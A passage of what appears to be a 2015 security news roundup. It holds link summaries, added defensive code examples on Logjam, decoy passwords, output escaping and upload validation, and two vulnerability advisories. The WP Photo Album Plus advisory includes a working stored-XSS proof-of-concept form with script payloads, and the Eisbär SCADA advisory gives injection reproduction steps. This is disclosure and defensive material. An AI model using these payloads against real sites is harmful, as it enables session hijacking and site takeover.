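    Cipher    : EXP-EDH-RSA-DES-CBC-SHA
"""
SAMPLE_1024 = """\
Server Temp Key: DH, 1024 bits
---
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : DHE-RSA-AES128-SHA
"""
SAMPLE_2048 = """\
Server Temp Key: DH, 2048 bits
---
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : DHE-RSA-AES256-GCM-SHA384
"""
SAMPLE_ECDHE = """\
Server Temp Key: ECDH, P-256, 256 bits
---
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES128-GCM-SHA256
"""
SAMPLE_REFUSED = """\
139953102747296:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:770:
---
no peer certificate available
---
New, (NONE), Cipher is (NONE)
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : 0000
"""

if __name__ == "__main__":
    for label, text in [("export", SAMPLE_EXPORT), ("1024", SAMPLE_1024),
                        ("2048", SAMPLE_2048), ("ecdhe", SAMPLE_ECDHE),
                        ("refused", SAMPLE_REFUSED)]:
        print(label, assess_dh(text))
    # Live use: print(assess_dh(run_s_client("your.host.example")))
```

Two probes are worth running per host: `-cipher EDH` to learn the group size the server actually uses, and `-cipher EXP` where the only acceptable outcome is `refused`. A server that is `ok` on the first probe but completes a handshake on the second is still a Logjam target, because the attack works by making the server pick the export suite, not by weakening the group it normally offers.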

FwpsStreamInjectAsync0 bug/leak - Bitdefender (0x4A)

Today I'll be investigating an issue involving Bitdefender, which turned out to be a Windows bug/issue when I thought it'd be on Bitdefender's side. Bitdefender's 0x4A bug check issue has been prevalent for quite a while now, but there's little to no documentation on solving it or what's causing it, just a few things to try like updating Bitdefender, uninstalling it, etc. I'll try to go as in-depth as I can, especially because I'm in contact with a Senior Dev at Bitdefender, and I'd like to provide as much information as my personal knowledge allows.

more here.......http://bsodanalysis.blogspot.com/2015/05/fwpsstreaminjectasync0-bugleak.html

An APT Case Study

The RSA IR team deals with APT actors on a daily basis on networks of various sizes. Regardless of the size of the network, or the number of advanced actors we find in them, one thing is paramount to both us and our customers during investigations: the ability to quickly scope the severity of the intrusion. Achieving this goal requires the best possible visibility, and tools flexible enough to allow our analysts to hunt for artifacts from both the network and the endpoint perspective.

RSA IR uses two flagship products to achieve this goal.

more here.....https://blogs.rsa.com/apt-case-study/

Paper: ErsatzPasswords – Ending Password Cracking

Abstract In this work we present a simple, yet effective and practical, scheme to improve the security of stored password hashes, rendering their cracking detectable and insuperable at the same time. We utilize a machine-dependent function, such as a physically unclonable function (PUF) or a hardware security module (HSM), at the authentication server. The scheme can be easily integrated with legacy systems without the need for any additional servers, changes to the structure of the hashed password file or any client modifications. When using the scheme the structure of the hashed passwords file, /etc/shadow or /etc/master.passwd, will appear no different than in the traditional scheme. However, when an attacker exfiltrates the hashed passwords file and tries to crack it, the only passwords he will get are the ersatzpasswords — the “fake passwords”. When an attempt to log in using these ersatzpasswords is detected, an alarm will be triggered in the system that someone attempted to crack the password file. Even with an adversary who knows the scheme, cracking cannot be launched without physical access to the authentication server. The scheme also includes a secure backup mechanism in the event of a failure of the hardware-dependent function. We discuss our implementation and provide some discussion in comparison to the traditional authentication scheme.

more here..........https://www.meshekah.com/research/publications_files/tr_ersatz_passwords.pdf
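The properties the abstract claims, worked through as an added example that is not the paper's implementation. The construction is my own reading of the abstract and is an assumption: an HMAC keyed with a secret that never leaves the authentication server stands in for the PUF/HSM "machine-dependent function" (HDF), and sha256 stands in for the slow password hash. The stored hash is over a plausible decoy, and the real password is tied in only through a mask that needs the HDF to undo, so a stolen file cracks to the decoy; presenting the decoy at login is the tripwire. The decoy mask is kept as a separate record field here for readability; the abstract says the real scheme leaves the file layout unchanged, and how it does so is not shown here.

```python
"""Toy ErsatzPasswords store: an exfiltrated file cracks only to decoy passwords.

Added example, not the paper's code. HMAC with a server-local key stands in for
the PUF/HSM machine-dependent function (HDF); sha256 stands in for a slow hash.
The record layout (salt, mask, hash) is an assumption for readability.
"""
import hashlib
import hmac
import secrets
from typing import Iterable, Optional

WIDTH = 32                               # fixed width so XOR with the HDF output is defined
MACHINE_KEY = secrets.token_bytes(32)    # stand-in for the hardware-bound secret (constructed)


def hdf(salt: bytes, password: str, key: bytes = MACHINE_KEY) -> bytes:
    """Machine-dependent function: cannot be evaluated without the server's key."""
    return hmac.new(key, salt + password.encode(), hashlib.sha256).digest()


def _pad(password: str) -> bytes:
    return password.encode().ljust(WIDTH, b"\0")[:WIDTH]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _h(salt: bytes, value: bytes) -> str:
    """The ordinary salted hash an attacker expects to find in the file."""
    return hashlib.sha256(salt + value).hexdigest()


def enroll(password: str, ersatz: str) -> dict:
    """Create a record; `ersatz` is a plausible decoy that cracking will 'recover'.

    The stored hash covers the decoy, not the real password. The real password
    is bound in through the mask: HDF(salt, real) XOR pad(ersatz)."""
    salt = secrets.token_bytes(16)
    return {"salt": salt,
            "mask": _xor(hdf(salt, password), _pad(ersatz)),
            "hash": _h(salt, _pad(ersatz))}


def verify(record: dict, attempt: str) -> str:
    """'ok' for the real password, 'alarm' if the decoy is presented, else 'fail'."""
    salt, mask, stored = record["salt"], record["mask"], record["hash"]
    # Real password: HDF(attempt) XOR mask reproduces pad(ersatz), whose hash is stored.
    if hmac.compare_digest(_h(salt, _xor(hdf(salt, attempt), mask)), stored):
        return "ok"
    # Decoy: hashes directly to the stored value. Only someone who cracked the file knows it.
    if hmac.compare_digest(_h(salt, _pad(attempt)), stored):
        return "alarm"
    return "fail"


def offline_crack(record: dict, wordlist: Iterable[str]) -> Optional[str]:
    """What an attacker holding the file (but not MACHINE_KEY) can do: an ordinary
    dictionary attack against salt+hash. The best it can find is the decoy."""
    for cand in wordlist:
        if _h(record["salt"], _pad(cand)) == record["hash"]:
            return cand
    return None


if __name__ == "__main__":
    rec = enroll("correct horse battery", "Summer2015!")
    print(verify(rec, "correct horse battery"))                      # ok
    print(offline_crack(rec, ["hunter2", "correct horse battery", "Summer2015!"]))
    print(verify(rec, "Summer2015!"))                                # alarm
```

The decoy must be something a cracker will actually hit and then try, so it should look like a real user's password, not random bytes. Because `MACHINE_KEY` is needed to evaluate `hdf`, the paper's backup mechanism for a failed PUF/HSM matters in practice: if that key is lost, every real password becomes unverifiable.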

Spy agencies target mobile phones, app stores to implant spyware

Users of millions of smartphones put at risk by certain mobile browser gaps, Snowden file shows
more here..http://www.cbc.ca/news/canada/spy-agencies-target-mobile-phones-app-stores-to-implant-spyware-1.3076546

Apache Jackrabbit 2.10.1.Release

This release fixes an important security issue in the jackrabbit-webdav module that you can access here....http://jackrabbit.apache.org/jcr/downloads.html

LaZagne- Credentials recovery project

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each piece of software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly used software. At this moment, it supports 22 programs on Microsoft Windows and 12 on Linux/Unix-like OSes.

more here........https://github.com/AlessandroZ/LaZagne

Evidence Acquisition and Analysis from iCloud

iCloud is a free cloud storage and cloud computing service designed by Apple to replace MobileMe. The service allows users to store data (music, pictures, videos, and applications) on remote servers and share them on devices with iOS 5 or later operating systems, on Apple computers running OS X Lion or later, or on a PC with Windows Vista or later. Similar to its predecessor, MobileMe, iCloud allows users to synchronize data between devices (e-mail, contacts, calendars, bookmarks, notes, reminders, iWork documents, and so on), or to make a backup of an iOS device (iPhone, iPad, or iPod touch) on remote servers rather than using iTunes and your local computer.

The iCloud service was announced on June 6, 2011 during the Apple Worldwide Developers Conference but became operational to the public from October 12, 2011. The MobileMe service was disabled as a result on June 30, 2012 and all users were transferred to the new environment. In July 2013, iCloud had more than 320 million users. Each iCloud account has 5 GB of free storage for the owners of iDevice with iOS 5 or later and Mac users with Lion or later.

more here.....http://articles.forensicfocus.com/2015/05/21/evidence-acquisition-and-analysis-from-icloud/

Steam Malware

Recently the Steam community has been getting more and more flooded by malware. Upon receiving more and more attempts by bots to infect our machines with malware we decided to investigate. We have collected as many samples as possible and analyzed how they work. I've been postponing writing this article for too long since we did this. Please note that most of this research was done before the Steam update that "patched" some of these issues.

read more here....http://ioexception.at/Steam-malware/

Cloudflare: Logjam: the latest TLS vulnerability explained

Yesterday, a group from INRIA, Microsoft Research, Johns Hopkins, the University of Michigan, and the University of Pennsylvania published a deep analysis of the Diffie-Hellman algorithm as used in TLS and other protocols. This analysis included a novel downgrade attack against the TLS protocol itself called Logjam, which exploits EXPORT cryptography (just like FREAK).
First, let me start by saying that CloudFlare customers are not and were never affected. We don’t support non-EC Diffie-Hellman ciphersuites on either the client or origin side. We also won't touch EXPORT-grade cryptography with a 20ft stick.
But why are CloudFlare customers safe, and how does Logjam work anyway?

read more here......https://blog.cloudflare.com/logjam-the-latest-tls-vulnerability-explained/

Lesser-known features of afl-fuzz

AFL is designed to be simple to use, but there are quite a few advanced, time-saving features that may be easy to overlook. So, here are several useful tricks that aren't covered in README: http://lcamtuf.blogspot.com/2015/05/lesser-known-features-of-afl-fuzz.html

Wednesday, May 20, 2015

Eisbär SCADA (All Versions - iOS, Android & W8) - Persistent UI Vulnerability

Document Title:
===============
Eisbär SCADA (All Versions - iOS, Android & W8) - Persistent UI Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1456


Release Date:
=============
2015-05-19


Vulnerability Laboratory ID (VL-ID):
====================================
1456


Common Vulnerability Scoring System:
====================================
5.2


Product & Service Introduction:
===============================
Eisbär (Polar Bear) KNX is a modern EIB/KNX visualization for all types of buildings. Applications: lighting, shading, heating, air conditioning, ventilation and security. Integration and integrated control reduce the capital and operating costs of buildings and systems, and improve flexibility in use and adaptation, comfort, safety and the optimization of running processes.

(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/eisbaer/id777598405 & http://www.busbaer.de/newbb_plus,viewtopic,topic_id,971,forum,81.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation vulnerability in the Eisbär SCADA v2.1.454.814 & v2.1.11 (iOS, Android & W8) application.


Vulnerability Disclosure Timeline:
==================================
2015-05-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Alexander Maier GmbH
Product: Eisbär SCADA - Mobile (Google Android, Windows Phone & Apple iOS) 2.1.11

Alexander Maier GmbH
Product: Eisbär SCADA - Software 2.1.454.814


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Eisbär SCADA v2.1.454.814 & v2.1.11 (iOS, Android & W8) application.
The vulnerability allows an attacker to inject script code into the application side of the affected mobile software and, through it, to compromise connected SCADA services.

We set up a test environment in which SCADA-controlled functions in our company could be executed from Android, iOS and Windows mobile devices. In that setup we found that the server configuration input introduces a common security risk.

The vulnerability is located in the `server name` value of the main network server settings module (Netzwerk). Local attackers with physical device access are able to manipulate the `netzwerk server name` input to compromise the mobile application or the connected Eisbär SCADA services. The attacker appends a script code payload to the server name, and the payload executes in the server index listing and in edit mode.

The attacker can also prepare a QR code carrying a complete configuration that contains the malicious server name. The payload executes after the scan or when the server listing is reviewed. The server name value is also used by the Eisbär Solutions section with the DoorPhone-Knoten service. We verified that the main server name component can be used to execute a function in the connected SCADA service without authorization. The server name can be changed in the app or directly in the node to manipulate the communication permanently.

The connection to the Eisbär (Polar Bear) SCADA server is multi-client capable, and the configuration data required for the app's network settings can be transferred automatically via QR code. Eisbär v2.1 also refers to a QR code component.

The security risk of the application-side web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 5.2.
Exploitation of the persistent input validation web vulnerability requires a low privilege application user account and low user interaction (click).
Successful exploitation of the persistent web vulnerability results in mobile application/device compromise or manipulation of connected service components.

Request Method(s):
                                [+] [Sync]

Vulnerable Module(s):
                                [+] Home > Server (Netzwerk)

Vulnerable Parameter(s):
                                [+] servername (name)

Affected Module(s):
                                [+] Home Index Server Listing
                                [+] Edit Server Entries


Proof of Concept (PoC):
=======================
The application-side input validation web vulnerability can be exploited by local attackers with a low privileged application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the mobile application on your Windows Phone, iOS or Android device
2. Start the application
3. Configure a service that connects successfully and exposes functions
4. Browse to the existing server home index listing
5. Edit the internal or external server entry: keep the existing address and append the payload
6. Save the input
7. The first execution occurs in the main index server listing
8. Click the arrow next to the injected code
9. The second execution occurs in the header section where the server name description becomes visible
10. Successful reproduction of the security vulnerability!

Note: use a server that exists as the payload host and attach your payload to it for a successful execution! The connection to the Eisbär (Polar Bear) SCADA server is multi-client capable, and the configuration data required for the app's network settings can be transferred automatically via QR code. Eisbär v2.1 also refers to a QR code component.


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the netzwerk servername value.
Restrict the input field and disallow script code tags and special characters.
Encode the server name on output in edit mode, and encode it again wherever the index listing renders the server name.


Security Risk:
==============
The security risk of the application-side input validation vulnerability in the server configuration is estimated as 
medium. (CVSS 5.2)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () evolution-sec com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () evolution-sec com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com
PGP KEY: http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29 txt

Lets Encrypt

Anyone who has gone through the trouble of setting up a secure website knows what a hassle getting a certificate can be. Let’s Encrypt automates away all this pain and lets site operators turn on HTTPS with a single click or shell command.

more here........https://letsencrypt.org/howitworks/

CNA Denies Cyber Insurance Claim

Cyber security, and cyber insurance, have dominated the industry headlines for several years now, but even as companies, brokers and insurers work to develop these products, there has been a dearth of case law interpreting key provisions.  This is beginning to change as disputes arise and make their way through the judicial system.

One such suit came last week when CNA filed a declaratory judgment action against its insured Cottage Health System, seeking reimbursement of both defense costs and a $4.125 million settlement it had paid out on a claim made under Cottage’s cyber policy.

more here.......http://www.privacyandsecuritymatters.com/2015/05/cna-denies-cyber-insurance-claim/

Cracking Apps Gromit! (Video)

Mark Danks talk at NSConference a month ago here......https://vimeo.com/124328842

Paper: Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice

ABSTRACT
We investigate the security of Diffie-Hellman key exchange as used in popular Internet protocols and find it to be less secure than widely believed. First, we present a novel flaw in TLS that allows a man-in-the-middle to downgrade connections to “export-grade” Diffie-Hellman. To carry out this attack, we implement the number field sieve discrete log algorithm. After a week-long precomputation for a specified 512-bit group, we can compute arbitrary discrete logs in this group in minutes. We find that 82% of vulnerable servers use a single 512-bit group, allowing us to compromise connections to 7% of Alexa Top Million HTTPS sites. In response, major browsers are being changed to reject short groups.

We go on to consider Diffie-Hellman with 768- and 1024-bit groups. A small number of fixed or standardized groups are in use by millions of TLS, SSH, and VPN servers. Performing precomputations on a few of these groups would allow a passive eavesdropper to decrypt a large fraction of Internet traffic. In the 1024-bit case, we estimate that such computations are plausible given nation-state resources, and a close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break. We conclude that moving to stronger key exchange methods should be a priority for the Internet community.

more here........https://weakdh.org/imperfect-forward-secrecy.pdf

Storm Kit – Changing the rules of the DDoS attack

Check Point researchers Liad Mizrachi & Oded Vanunu have conducted research on the Storm Kit functionality and attack methods here.....http://blog.checkpoint.com/2015/05/20/storm-kit-changing-the-rules-of-the-ddos-attack/

Bedep Ad-Fraud Botnet Analysis – Exposing the Mechanics Behind 153.6M Defrauded Ad Impressions A Day

Following on from our post on Angler EK, we are going to expose the mechanics behind the Bedep ad-fraud malware. Recently Bedep has been observed as the payload dropped by Angler EK in a series of malvertising campaigns. These campaigns have led to a rapid rise in the rate of Bedep infections, with Arbor Networks observing just over 80K infections over a 3-day period.

more here......http://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/

lightwave

VMware Lightwave is a software stack geared towards providing identity services including authentication and authorization for large-scale distributed infrastructure, applications and containers.

VMware Lightwave consists of the following primary components.

VMware Directory Service (vmdir)
VMware Certificate Authority (vmca)
VMware Authentication Framework Daemon/Service (vmafd)
VMware Secure Token Service (vmware-sts)

more here......https://github.com/vmware/lightwave

RIG Exploit Kit Infection Cycle Analysis

Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year. In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit. ThreatLabZ has been keeping an eye on RIG and in this post we'll cover an example of a full RIG infection cycle.

read more here......http://research.zscaler.com/2015/05/rig-exploit-kit-infection-cycle-analysis.html

SpyStudio Is Now Free: Create and Troubleshoot Application Virtualization Packages for Windows

SpyStudio is now free. It is a Swiss Army knife for cyber security analysts, DevOps, QA engineers, and developers.

more here......http://blog.nektra.com/main/2015/05/20/spystudio-is-now-free-create-and-troubleshoot-application-virtualization-packages-for-windows/

Defcon Quals: r0pbaby (simple 64-bit ROP)

This past weekend I competed in the Defcon CTF Qualifiers from the Legit Business Syndicate. In the past it's been one of my favourite competitions, and this year was no exception!

Unfortunately, I got stuck for quite a long time on a 2-point problem ("wwtw") and spent most of my weekend on it. But I did do a few others - r0pbaby included - and am excited to write about them, as well!

r0pbaby is neat, because it's an absolute bare-bones ROP (return-oriented programming) level. Quite honestly, when it makes sense, I actually prefer using a ROP chain to using shellcode.

more here......https://blog.skullsecurity.org/2015/defcon-quals-r0pbaby-simple-64-bit-rop

Ransomware Response Kit

I have compiled this kit to be used for security professionals and system administrators alike, in order to help streamline the process of responding to ransomware infections here....https://bitbucket.org/jadacyrus/ransomwareremovalkit/overview

Stored XSS in WP Photo Album Plus WordPress Plugin

Advisory ID: HTB23257
Product: WP Photo Album Plus WordPress Plugin
Vendor: J.N. Breetvelt
Vulnerable Version(s): 6.1.2 and probably prior
Tested Version: 6.1.2
Advisory Publication:  April 29, 2015  [without technical details]
Vendor Notification: April 29, 2015 
Vendor Patch: April 29, 2015 
Public Disclosure: May 20, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-3647
Risk Level: Medium 
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a stored XSS vulnerability in the WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of a vulnerable WordPress installation. An attacker might be able to hijack the administrator’s session and obtain full control over the vulnerable website.

The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to the "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a comment.

A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in the administrator’s browser in the context of the vulnerable website, when the administrator views images or comments in the administrative interface.

The simple exploit below will store JS code in the WP database and display a JS popup window with the word "ImmuniWeb" every time the administrator views comments or images:


<form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main">
<input type="hidden" name="action"  value='wppa'>
<input type="hidden" name="wppa-action"  value='do-comment'>
<input type="hidden" name="photo-id"  value='2'>
<input type="hidden" name="comment"  value='1'>
<input type="hidden" name="moccur"  value='1'>
<input type="hidden" name="comemail"  value='"><script>alert(/ImmuniWeb/);</script>'>
<input type="hidden" name="comname"  value='"><script>alert(/ImmuniWeb/);</script>'>
<input type="submit" id="btn">
</form>


The code will be automatically executed, when the administrator visits one of the following pages:

http://[host]/wp-admin/admin.php?page=wppa_manage_comments
http://[host]/wp-admin/admin.php?page=wppa_moderate_photos

-----------------------------------------------------------------------------------------------

Solution:

Update to WP Photo Album Plus 6.1.3

More Information:
https://wordpress.org/plugins/wp-photo-album-plus/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin.
[2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
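The data flow in the advisory above, as an added example that is neither the plugin's code nor High-Tech Bridge's: a comment name and e-mail are stored exactly as posted and later rendered into an admin page, once without and once with HTML entity encoding. The same output-encoding principle is the fix proposed for the server-name field in the Eisbär SCADA advisory and for the reflected `file` parameter in the webgrind report earlier on this page. Function names are my own and the stored rows are constructed in memory; the payload string is the one the advisory uses.

```python
"""Stored XSS through unescaped comment fields: vulnerable vs. hardened rendering.

Added example; not the plugin's code. Names below are my own; rows are
constructed in memory. PAYLOAD is quoted verbatim from the advisory.
"""
import html
import re

PAYLOAD = '"><script>alert(/ImmuniWeb/);</script>'

_COMMENTS = []                                    # stand-in for the plugin's comments table
_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def store_comment(photo_id, comname, comemail, comment):
    """Persist exactly what was posted: no filtering, as the advisory describes."""
    _COMMENTS.append({"photo_id": photo_id, "comname": comname,
                      "comemail": comemail, "comment": comment})


def render_admin_comments(escape_output):
    """Admin listing (think admin.php?page=wppa_manage_comments).

    With escape_output=False the stored payload closes the value="" attribute
    and lands in the page as live markup. With True every field is entity-encoded,
    quotes included, so the browser shows it as text."""
    enc = (lambda s: html.escape(str(s), quote=True)) if escape_output else (lambda s: str(s))
    rows = []
    for c in _COMMENTS:
        rows.append(
            f'<tr><td>{enc(c["photo_id"])}</td>'
            f'<td><input name="comname" value="{enc(c["comname"])}"></td>'
            f'<td><input name="comemail" value="{enc(c["comemail"])}"></td>'
            f'<td>{enc(c["comment"])}</td></tr>'
        )
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def contains_live_script(markup):
    """True if a real <script> tag survives into the page as markup, not text."""
    return bool(_SCRIPT_TAG.search(markup))


def find_suspicious_comments():
    """Post-patch triage: rows stored before the fix keep their payloads regardless
    of how output is handled now; flag anything carrying angle brackets."""
    return [c for c in _COMMENTS
            if any(ch in c["comname"] + c["comemail"] for ch in "<>")]


if __name__ == "__main__":
    store_comment(2, PAYLOAD, PAYLOAD, "1")       # what the advisory's form submits
    print(render_admin_comments(escape_output=False))   # <script> is live here
    print(render_admin_comments(escape_output=True))    # shown as &lt;script&gt; text
    print(find_suspicious_comments())
```

Encoding at the point of output is what neutralises the payload; the attribute context (`value="..."`) is why `quote=True` matters, since without it the `"` in the payload still closes the attribute. After updating to 6.1.3, running the triage query over comments posted before the update is worthwhile, because the patch changes how new output is produced, not what is already in the database.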

CVE-2015-2079: Arbitrary Command Execution in Usermin

While performing a penetration test for a customer, I stumbled across a command execution vulnerability in Usermin that is pretty trivial to identify and to exploit. The interesting part is that this vulnerability survived for almost 13 years.

more here........http://codewhitesec.blogspot.de/2015/05/cve-2015-2079-rce-usermin.html

rd

Android anti-root detection Proof of Concept here......https://github.com/serianox/rd

polygraph

Signature generation algorithms for polymorphic worms here......https://github.com/sporksmith/polygraph

JARVIS

Why JARVIS?

JARVIS means "Just Another ReVersIng Suite" or whatever other bullshit you can think of :)

What is it?

It is a plugin for IDA Pro designed to assist you with the most common reversing tasks


more here.........https://github.com/carlosgprado/JARVIS/blob/master/jarvis/docs/README.md

Exploit for SuiteCRM Post-Authentication Shell Upload (PoC Included)

SuiteCRM suffers from a post-authentication shell upload vulnerability in its "Upload Company Logo" functionality, wherein it uses a blacklist in an attempt to prevent the upload of executable code. Furthermore, its "check for valid image" test leaves uploaded files in a temporary directory that is web accessible. It is possible to bypass the blacklist and upload executable PHP code with the "phtml" extension to this temporary directory, and thus gain code execution in the context of the webserver user on the affected system.

more here.....https://github.com/XiphosResearch/exploits/tree/master/suiteshell
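The two defects the write-up describes, side by side with their fixes, as an added example that is neither SuiteCRM's code nor the Xiphos exploit. The deny-list contents and the helper names are assumptions; the sample bytes are constructed (the "PNG" is just the 8-byte signature padded out). The vulnerable check accepts any extension it has not heard of, so `logo.phtml` passes even though mod_php setups commonly execute `.phtml`; the hardened path allow-lists image extensions, checks the bytes against the declared type, and only then writes the file, under a random server-chosen name, so nothing unvalidated ever sits in a web-reachable temp directory.

```python
"""Extension deny-list bypass vs. allow-list plus content validation for uploads.

Added example; not SuiteCRM's code. DENIED_EXTENSIONS and the function names
are assumptions; PHP_SCRIPT and PNG_STUB are constructed samples.
"""
import os
import secrets
import tempfile
from typing import Optional

# Assumed deny-list: the kind of list the write-up says the logo upload relies on.
DENIED_EXTENSIONS = {"php", "php3", "php4", "php5", "phps", "phar", "pl", "cgi", "sh"}

# Allow-list for a logo: extension -> magic bytes the content must start with.
IMAGE_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

PHP_SCRIPT = b"<?php phpinfo(); ?>"                      # constructed
PNG_STUB = IMAGE_SIGNATURES["png"] + b"\x00" * 16        # constructed; not a complete PNG


def ext_of(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def blacklist_allows(filename: str) -> bool:
    """Vulnerable: anything not on the deny-list is accepted, so logo.phtml passes."""
    return ext_of(filename) not in DENIED_EXTENSIONS


def allowlist_allows(filename: str, data: bytes) -> bool:
    """Hardened: extension must be a known image type AND the bytes must match it."""
    sig = IMAGE_SIGNATURES.get(ext_of(filename))
    return sig is not None and data.startswith(sig)


def save_upload_hardened(filename: str, data: bytes, dest_dir: str) -> Optional[str]:
    """Validate in memory first, then write under a random server-chosen name.

    Nothing touches disk until the check passes, and the client's filename
    never becomes the stored name, so double extensions buy the attacker nothing."""
    if not allowlist_allows(filename, data):
        return None
    path = os.path.join(dest_dir, f"{secrets.token_hex(16)}.{ext_of(filename)}")
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Exercise both checks over the constructed samples in a scratch directory."""
    with tempfile.TemporaryDirectory() as d:
        saved = save_upload_hardened("logo.png", PNG_STUB, d)
        return {
            "phtml_passes_blacklist": blacklist_allows("logo.phtml"),
            "php_passes_blacklist": blacklist_allows("logo.php"),
            "phtml_passes_allowlist": allowlist_allows("logo.phtml", PHP_SCRIPT),
            "script_named_png_passes": allowlist_allows("logo.png", PHP_SCRIPT),
            "real_png_passes": allowlist_allows("logo.png", PNG_STUB),
            "saved_under_random_name": (saved is not None
                                        and os.path.basename(saved) != "logo.png"
                                        and saved.endswith(".png")),
            "phtml_rejected_before_write": save_upload_hardened("logo.phtml", PHP_SCRIPT, d) is None,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

A magic-byte check is not a full image parse, and a file that starts with a valid PNG header can still carry PHP further in; what keeps that from mattering is that the stored name can only end in an allow-listed extension the web server does not hand to PHP, and that the file is never exposed before validation. Storing uploads outside the document root and serving them through a handler that sets the content type is the remaining step.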


US export control of 0days and trojans is (finally) coming?

From the Federal Register (Daily Journal of the United States Government), a Proposed Rule by the Industry and Security Bureau on 05/20/2015 here......https://www.federalregister.gov/articles/2015/05/20/2015-11642/wassenaar-arrangement-2013-plenary-agreements-implementation-intrusion-and-surveillance-items

